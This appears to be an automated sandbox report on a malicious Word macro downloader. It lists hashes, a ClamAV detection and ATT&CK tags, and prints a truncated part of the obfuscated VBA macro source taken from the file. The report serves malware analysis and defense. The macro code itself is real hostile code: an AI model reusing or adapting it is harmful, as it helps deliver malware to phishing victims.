Office (OLE) malware analysis — malicious · 7815721d62ea9bb8

MALICIOUS

Office (OLE)

178.5 KB Created: 2018-05-08 19:00:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 4610d2cf9edcc9074971624c354774e1 SHA-1: 12318a5701828dc35903dc1b12a92dc12214aa82 SHA-256: 7815721d62ea9bb86f4c347bc660a00437f64c8c04c658469d19994ea722b2d0

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating it's a macro-based downloader. The presence of a Document_Open macro and VBA macros further supports this classification. The VBA script likely attempts to download and execute a secondary payload, a common tactic for initial compromise via spearphishing attachments.

Heuristics 4

ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13272 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13272 bytes
SHA-256: `8ec5b03ab58c676cead9ae88197053906dfdbfa3e9515d5bc3a5bce288705a81`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub landholding() Dim campagna As Integer Dim loaves As Variant carver.hydrocharis.Value = Day(#12/5/2013#) varday = locality = charophyceae spare = blackandwhite cadastral = "cabdriver" newspaper = "delaware" cobia = "genetically" endured = "gyroscopic" asura = "originate" finglefangle = "exclaim" Set distensible = carver.hydrocharis.SelectedItem kolkhoz = 3 + 14 Pmt 0, kolkhoz, 9088, 20588, 7 stockpile = distensible.Name migrate = 99 - 48 + 7793 resident = Right(stockpile, migrate) guardhouse = elevated.codified(resident) gang = 10 + 2 Pmt 0, gang, 37373, 31590, 4 deletory = musophagidae #If (62 - 111 + 449 + 12 - 44 + 332) > ((108 - 99 + 311) - (21 - 96 + 615) * 1) And ((23 - 27 + 32) - (80 - 107 + 55)) * 2 < (Win64) Then Dim devil As Integer Dim malacia As LongPtr Dim bobsleigh As LongPtr Dim methodism As Variant #ElseIf (114 - 22 + 308 + 118 - 99 + 281) > ((117 - 121 + 324) - (2 - 40 + 578) * 1) And Not ((21 - 63 + 70) - (127 - 32 - 67)) * 2 < (Win64) Then Dim musketeer As Integer Dim bobsleigh As Long Dim steelplate As Long Dim malacia As Long #End If purgative = 86 - 45 - 41 seautongr = unmask snappy = "manta" molecular = 16 - 89 + 4169 stores = 20 + 1 Pmt 0, stores, 33072, 54190, 5 doodia = outrageously ordinand = "blossoms" dove = 58 + 29 Pmt 0, dove, 31866, 46095, 5 alone = guardhouse emendation = "contrasty" bowery = "boise" malacia = euterpe(alone) miami = eviscerate #If (6 - 2 + 396 + 113 - 59 + 246) > ((93 - 38 + 265) - (40 - 107 + 607) * 1) And ((83 - 102 + 47) - (93 - 96 + 31)) * 2 < (Win64) Then Dim residuum As Byte Dim america As LongPtr Dim satanophobia As LongPtr Dim bury As LongPtr aircooled = 15 - 4 + 2053 #ElseIf (58 - 88 + 430 + 107 - 24 + 217) > ((75 - 61 + 306) - (46 - 17 + 511) * 1) And Not ((42 - 17 + 3) - (103 - 68 - 7)) * 2 < (Win64) Then Dim america As Long misdo = 41 - 50 + 790 Dim satanophobia As Long Dim bury As Long aircooled = misdo + 3459 #End If Dim tapir As String Dim hypophysectomized As Byte america = 83 - 2 - 81 bobsleigh = malacia + aircooled satanophobia = 95 - 72 + 201504 bury = 97 - 119 + 3522 draggletailed = margaret(satanophobia, america, bobsleigh, america, america, america, america) stodge = 1 + 43 Pmt 0, stodge, 38284, 21989, 4 End Sub Function acanthocytosis(pen, suavely, tenpenny) Dim flickknife As Long Dim alexipharmic As String Dim minutia As Long Dim bodacious As Long Dim veriest As Long Dim dulciana As Variant Dim baronduki As Long Dim dyadic As Long Dim sunray As Long Dim expectations As Long Dim tobbaconist As Integer cantankerously = cantankerously cantankerously = nucifraga flickknife = pen sunray = tenpenny cantankerously = nucifraga veriest = suavely gastromancy = 30 + 23 Pmt 0, gastromancy, 26750, 33607, 4 combined = combined / 141 minutia = 58 - 105 + 46 octant ByVal minutia, flickknife, veriest, sunray, baronduki cantankerously = "audiogram" End Function Function onethousandth(lamplit, caw, dimidiation) Dim phantasmagoria As Integer Dim pectoral As Byte Dim demiglace As LongPtr Dim misery As LongPtr Dim chatham As LongPtr Dim mothernaked As String Dim amaze As LongPtr Dim beggarweed As LongPtr combined = Fix(69) combined = Math.Round(479) misery = lamplit beggarweed = dimidiation combined = Math.Round(397) amaze = caw thuringia = 13 + 42 Pmt 0, thuringia, 2281, 12908, 5 combined = baited Or 488 demiglace = 77 - 19 - 59 octant ByVal demiglace, _ misery, _ amaze, beggarweed, _ chatham nucifraga = "disembroil" End Function Function euterpe(anabolic) Dim boundaries As Variant Dim accord As Variant Dim nagi As Integer Dim creatine As String #If (20 - 43 + 423 + 15 - 43 + 328) > ((13 - 21 + 328) - (12 - 50 + 578) * 1) And ((65 - 74 ... (truncated)

SHA-256: 8ec5b03ab58c676cead9ae88197053906dfdbfa3e9515d5bc3a5bce288705a81

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub landholding()
Dim campagna As Integer
Dim loaves As Variant
carver.hydrocharis.Value = Day(#12/5/2013#)
varday = locality = charophyceae
spare = blackandwhite
cadastral = "cabdriver"
newspaper = "delaware"
cobia = "genetically"

endured = "gyroscopic"
asura = "originate"
finglefangle = "exclaim"
Set distensible = carver.hydrocharis.SelectedItem
kolkhoz = 3 + 14
 Pmt 0, kolkhoz, 9088, 20588, 7

stockpile = distensible.Name
migrate = 99 - 48 + 7793
resident = Right(stockpile, migrate)
guardhouse = elevated.codified(resident)
gang = 10 + 2
 Pmt 0, gang, 37373, 31590, 4

deletory = musophagidae
#If (62 - 111 + 449 + 12 - 44 + 332) > ((108 - 99 + 311) - (21 - 96 + 615) * 1) And ((23 - 27 + 32) - (80 - 107 + 55)) * 2 < (Win64) Then
Dim devil As Integer
Dim malacia As LongPtr
Dim bobsleigh As LongPtr
Dim methodism As Variant
#ElseIf (114 - 22 + 308 + 118 - 99 + 281) > ((117 - 121 + 324) - (2 - 40 + 578) * 1) And Not ((21 - 63 + 70) - (127 - 32 - 67)) * 2 < (Win64) Then
Dim musketeer As Integer
Dim bobsleigh As Long
Dim steelplate As Long
Dim malacia As Long
#End If
purgative = 86 - 45 - 41
seautongr = unmask
snappy = "manta"
molecular = 16 - 89 + 4169
stores = 20 + 1
 Pmt 0, stores, 33072, 54190, 5

doodia = outrageously
ordinand = "blossoms"
dove = 58 + 29
 Pmt 0, dove, 31866, 46095, 5

alone = guardhouse
emendation = "contrasty"
bowery = "boise"
malacia = euterpe(alone)
miami = eviscerate
#If (6 - 2 + 396 + 113 - 59 + 246) > ((93 - 38 + 265) - (40 - 107 + 607) * 1) And ((83 - 102 + 47) - (93 - 96 + 31)) * 2 < (Win64) Then
Dim residuum As Byte
Dim america As LongPtr
Dim satanophobia As LongPtr
Dim bury As LongPtr
aircooled = 15 - 4 + 2053
#ElseIf (58 - 88 + 430 + 107 - 24 + 217) > ((75 - 61 + 306) - (46 - 17 + 511) * 1) And Not ((42 - 17 + 3) - (103 - 68 - 7)) * 2 < (Win64) Then
Dim america As Long
misdo = 41 - 50 + 790
Dim satanophobia As Long
Dim bury As Long
aircooled = misdo + 3459

#End If
Dim tapir As String
Dim hypophysectomized As Byte
america = 83 - 2 - 81
bobsleigh = malacia + aircooled
satanophobia = 95 - 72 + 201504
bury = 97 - 119 + 3522
draggletailed = margaret(satanophobia, america, bobsleigh, america, america, america, america)
stodge = 1 + 43
 Pmt 0, stodge, 38284, 21989, 4

End Sub

Function acanthocytosis(pen, suavely, tenpenny)
Dim flickknife As Long
Dim alexipharmic As String
Dim minutia As Long
Dim bodacious As Long
Dim veriest As Long
Dim dulciana As Variant
Dim baronduki As Long
Dim dyadic As Long
Dim sunray As Long
Dim expectations As Long
Dim tobbaconist As Integer
cantankerously = cantankerously
cantankerously = nucifraga
flickknife = pen
sunray = tenpenny
cantankerously = nucifraga
veriest = suavely
gastromancy = 30 + 23
 Pmt 0, gastromancy, 26750, 33607, 4

combined = combined / 141
minutia = 58 - 105 + 46
octant ByVal minutia, flickknife, veriest, sunray, baronduki
cantankerously = "audiogram"
End Function
Function onethousandth(lamplit, caw, dimidiation)
Dim phantasmagoria As Integer
Dim pectoral As Byte
Dim demiglace As LongPtr
Dim misery As LongPtr
Dim chatham As LongPtr
Dim mothernaked As String
Dim amaze As LongPtr
Dim beggarweed As LongPtr
combined = Fix(69)
combined = Math.Round(479)
misery = lamplit
beggarweed = dimidiation
combined = Math.Round(397)
amaze = caw
thuringia = 13 + 42
 Pmt 0, thuringia, 2281, 12908, 5

combined = baited Or 488
demiglace = 77 - 19 - 59
octant ByVal demiglace, _
misery, _
amaze, beggarweed, _
chatham
nucifraga = "disembroil"
End Function
Function euterpe(anabolic)
Dim boundaries As Variant
Dim accord As Variant
Dim nagi As Integer
Dim creatine As String
#If (20 - 43 + 423 + 15 - 43 + 328) > ((13 - 21 + 328) - (12 - 50 + 578) * 1) And ((65 - 74 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.